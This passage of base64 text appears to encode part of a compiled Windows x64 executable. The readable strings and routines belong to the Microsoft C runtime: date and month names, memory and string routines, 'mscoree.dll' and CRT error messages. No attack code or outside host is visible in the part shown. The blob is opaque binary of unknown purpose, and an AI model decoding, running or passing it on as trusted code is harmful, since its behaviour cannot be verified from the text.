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Li/gAAADotMj//0iLiwABAADoqMj//0iLiwgBAADonMj//0iLixABAADokMj//0iLixgBAADohMj//0iLiyABAADoeMj//0iLiygBAADobMj//0iLizABAADoYMj//0iLizgBAADoVMj//0iLi0ABAADoSMj//0iLi0gBAADoPMj//0iLi1ABAADoMMj//0iLi3ABAADoJMj//0iLi3gBAADoGMj//0iLi4ABAADoDMj//0iLi4gBAADoAMj//0iLi5ABAADo9Mf//0iLi5gBAADo6Mf//0iLi2gBAADo3Mf//0iLi6gBAADo0Mf//0iLi7ABAADoxMf//0iLi7gBAADouMf//0iLi8ABAADorMf//0iLi8gBAADooMf//0iLi9ABAADolMf//0iLi6ABAADoiMf//0iLi9gBAADofMf//0iLi+ABAADocMf//0iLi+gBAADoZMf//0iLi/ABAADoWMf//0iLi/gBAADoTMf//0iLiwACAADoQMf//0iLiwgCAADoNMf//0iLixACAADoKMf//0iLixgCAADoHMf//0iLiyACAADoEMf//0iLiygCAADoBMf//0iLizACAADo+Mb//0iLizgCAADo7Mb//0iLi0ACAADo4Mb//0iLi0gCAADo1Mb//0iLi1ACAADoyMb//0iLi1gCAADovMb//0iLi2ACAADosMb//0iLi2gCAADopMb//0iLi3ACAADomMb//0iLi3gCAADojMb//0iLi4ACAADogMb//0iLi4gCAADodMb//0iLi5ACAADoaMb//0iLi5gCAADoXMb//0iLi6ACAADoUMb//0iLi6gCAADoRMb//0iLi7ACAADoOMb//0iLi7gCAADoLMb//0iDxCBbw8zMSIXJdGZTSIPsIEiL2UiLCUg7DXVoAAB0BegGxv//SItLCEg7DWtoAAB0Bej0xf//SItLEEg7DWFoAAB0Bejixf//SItLWEg7DZdoAAB0BejQxf//SItLYEg7DY1oAAB0Bei+xf//SIPEIFvDSIXJD4QAAQAAU0iD7CBIi9lIi0kYSDsNHGgAAHQF6JXF//9Ii0sgSDsNEmgAAHQF6IPF//9Ii0soSDsNCGgAAHQF6HHF//9Ii0swSDsN/mcAAHQF6F/F//9Ii0s4SDsN9GcAAHQF6E3F//9Ii0tASDsN6mcAAHQF6DvF//9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1bgBNYXkAQXByAE1hcgBGZWIASmFuAFNhdHVyZGF5AAAAAEZyaWRheQAAAAAAAFRodXJzZGF5AAAAAAAAAABXZWRuZXNkYXkAAAAAAAAAVHVlc2RheQBNb25kYXkAAFN1bmRheQAAU2F0AEZyaQBUaHUAV2VkAFR1ZQBNb24AU3VuAAAAAAByAHUAbgB0AGkAbQBlACAAZQByAHIAbwByACAAAAAAAA0ACgAAAAAAVABMAE8AUwBTACAAZQByAHIAbwByAA0ACgAAAAAAAABTAEkATgBHACAAZQByAHIAbwByAA0ACgAAAAAAAAAAAEQATwBNAEEASQBOACAAZQByAHIAbwByAA0ACgAAAAAAAAAAAAAAAABSADYAMAAzADMADQAKAC0AIABBAHQAdABlAG0AcAB0ACAAdABvACAAdQBzAGUAIABNAFMASQBMACAAYwBvAGQAZQAgAGYAcgBvAG0AIAB0AGgAaQBzACAAYQBzAHMAZQBtAGIAbAB5ACAAZAB1AHIAaQBuAGcAIABuAGEAdABpAHYAZQAgAGMAbwBkAGUAIABpAG4AaQB0AGkAYQBsAGkAegBhAHQAaQBvAG4ACgBUAGgAaQBzACAAaQBuAGQAaQBjAGEAdABlAHMAIABhACAAYgB1AGcAIABpAG4AIAB5AG8AdQByACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC4AIABJAHQAIABpAHMAIABtAG8AcwB0ACAAbABpAGsAZQBsAHkAIAB0AGgAZQAgAHIAZQBzAHUAbAB0ACAAbwBmACAAYwBhAGwAbABpAG4AZwAgAGEAbgAgAE0AUwBJAEwALQBjAG8AbQBwAGkAbABlAGQAIAAoAC8AYwBsAHIAKQAgAGYAdQBuAGMAdABpAG8AbgAgAGYAcgBvAG0AIABhACAAbgBhAHQAaQB2AGUAIABjAG8AbgBzAHQAcgB1AGMAdABvAHIAIABvAHIAIABmAHIAbwBtACAARABsAGwATQBhAGkAbgAuAA0ACgAAAAAAUgA2ADAAMwAyAA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAbABvAGMAYQBsAGUAIABpAG4AZgBvAHIAbQBhAHQAaQBvAG4ADQAKAAAAAAAAAAAAAAAAAFIANgAwADMAMQANAAoALQAgAEEAdAB0AGUAbQBwAHQAIAB0AG8AIABpAG4AaQB0AGkAYQBsAGkAegBlACAAdABoAGUAIABDAFIAVAAgAG0AbwByAGUAIAB0AGgAYQBuACAAbwBuAGMAZQAuAAoAVABoAGkAcwAgAGkAbgBkAGkAYwBhAHQAZQBzACAAYQAgAGIAdQBnACAAaQBuACAAeQBvAHUAcgAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgAuAA0ACgAAAAAAUgA2ADAAMwAwAA0ACgAtACAAQwBSAFQAIABuAG8AdAAgAGkAb